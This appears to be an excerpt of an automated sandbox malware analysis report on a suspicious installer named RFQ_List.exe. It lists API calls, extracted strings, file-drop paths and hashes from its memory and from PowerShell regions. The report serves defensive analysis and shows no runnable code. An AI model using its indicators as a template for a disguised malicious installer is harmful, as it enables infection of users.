                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                  • String ID:
                  • API String ID: 2531174081-0
                  • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                  • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                  • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                  • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                  APIs
                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                  • GetMessagePos.USER32 ref: 00404AA1
                  • ScreenToClient.USER32(?,?), ref: 00404ABB
                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Message$Send$ClientScreen
                  • String ID: f
                  • API String ID: 41195575-1993550816
                  • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                  • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                  • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                  • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                  APIs
                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                  • MulDiv.KERNEL32(00026800,00000064,000E27F8), ref: 00402D4D
                  • wsprintfW.USER32 ref: 00402D5D
                  • SetWindowTextW.USER32(?,?), ref: 00402D6D
                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                  Strings
                  • verifying installer: %d%%, xrefs: 00402D57
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Text$ItemTimerWindowwsprintf
                  • String ID: verifying installer: %d%%
                  • API String ID: 1451636040-82062127
                  • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                  • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                  • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                  • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                  APIs
                  • GetDC.USER32(?), ref: 00401D59
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                  • ReleaseDC.USER32(?,00000000), ref: 00401D86
                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CapsCreateDeviceFontIndirectRelease
                  • String ID: Tahoma
                  • API String ID: 3808545654-3580928618
                  • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                  • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                  • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                  • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                  • GlobalFree.KERNEL32(?), ref: 004028E9
                  • GlobalFree.KERNEL32(00000000), ref: 004028FC
                  • CloseHandle.KERNEL32(?), ref: 00402914
                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                  • String ID:
                  • API String ID: 2667972263-0
                  • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                  • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                  • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                  • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                  APIs
                  • WideCharToMultiByte.KERNEL32(?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,000000FF,C:\Windows\resources\0809\gildes.lak,00000400,?,?,00000021), ref: 00402583
                  • lstrlenA.KERNEL32(C:\Windows\resources\0809\gildes.lak,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,000000FF,C:\Windows\resources\0809\gildes.lak,00000400,?,?,00000021), ref: 0040258E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: ByteCharMultiWidelstrlen
                  • String ID: C:\Windows\resources\0809\gildes.lak$Copy to C:\Users\Public\Desktop\Bardehvalers.unw
                  • API String ID: 3109718747-4159403888
                  • Opcode ID: 124bc1b9933efb7c56f85c679ca816716a721c48624739d77ea3ba7bc55c233f
                  • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                  • Opcode Fuzzy Hash: 124bc1b9933efb7c56f85c679ca816716a721c48624739d77ea3ba7bc55c233f
                  • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                  APIs
                  • GetDlgItem.USER32(?,?), ref: 00401D00
                  • GetClientRect.USER32(00000000,?), ref: 00401D0D
                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                  • DeleteObject.GDI32(00000000), ref: 00401D4B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                  • String ID:
                  • API String ID: 1849352358-0
                  • Opcode ID: 1a74f2179679fb2cdf553b0348ac08105bc06b0e0a733d0f1a12f3a9490ff99b
                  • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                  • Opcode Fuzzy Hash: 1a74f2179679fb2cdf553b0348ac08105bc06b0e0a733d0f1a12f3a9490ff99b
                  • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                  APIs
                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                  • wsprintfW.USER32 ref: 00404A1A
                  • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: ItemTextlstrlenwsprintf
                  • String ID: %u.%u%s%s
                  • API String ID: 3540041739-3551169577
                  • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                  • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                  • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                  • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                  APIs
                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                  Strings
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CharPrevlstrcatlstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\
                  • API String ID: 2659869361-3081826266
                  • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                  • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                  • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                  • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                  APIs
                  • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                  • GetTickCount.KERNEL32 ref: 00402DBB
                  • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                  • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                  • String ID:
                  • API String ID: 2102729457-0
                  • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                  • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                  • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                  • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                  APIs
                  • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                  • GlobalFree.KERNEL32(?), ref: 0040382A
                  Strings
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Free$GlobalLibrary
                  • String ID: C:\Users\user\AppData\Local\Temp\
                  • API String ID: 1100898210-3081826266
                  • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                  • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                  • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                  • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                  APIs
                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ_List.exe,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ_List.exe,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CharPrevlstrlen
                  • String ID: C:\Users\user\Desktop
                  • API String ID: 2709904686-224404859
                  • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                  • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                  • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                  • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                  APIs
                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                  • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: lstrlen$CharNextlstrcmpi
                  • String ID:
                  • API String ID: 190613189-0
                  • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                  • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                  • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                  • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.2338701963.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7820000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                  • API String ID: 0-4202989938
                  • Opcode ID: f74c5f515b7b529cb24e8169b5f5db8619abf0c079b12d1a9ede076b71327669
                  • Instruction ID: faf1aaf8795a0018cf31a0f60e8ca3449a781fe8f81618bfb06a1847e58829ad
                  • Opcode Fuzzy Hash: f74c5f515b7b529cb24e8169b5f5db8619abf0c079b12d1a9ede076b71327669
                  • Instruction Fuzzy Hash: 40035FB4A00228DFD724DF54C854BAABBB2BF85305F50C5A9D909AB780CB35ED86CF51
                  Memory Dump Source
                  • Source File: 00000001.00000002.2331900291.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_4ca0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 46d10e47b853c4e0c0cddad4b152838589f390408a55f34325416123c56b3436
                  • Instruction ID: 1dcdbb65dc764b84985153f6def621685e6603b5483b01ac94a6881a5684a2b4
                  • Opcode Fuzzy Hash: 46d10e47b853c4e0c0cddad4b152838589f390408a55f34325416123c56b3436
                  • Instruction Fuzzy Hash: C6529F30B0021ACFDB14DF65C8547ADBBB3AF85308F148599D849E7351EB34AA96CF92
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.2338701963.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_7820000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                  • API String ID: 0-306622666
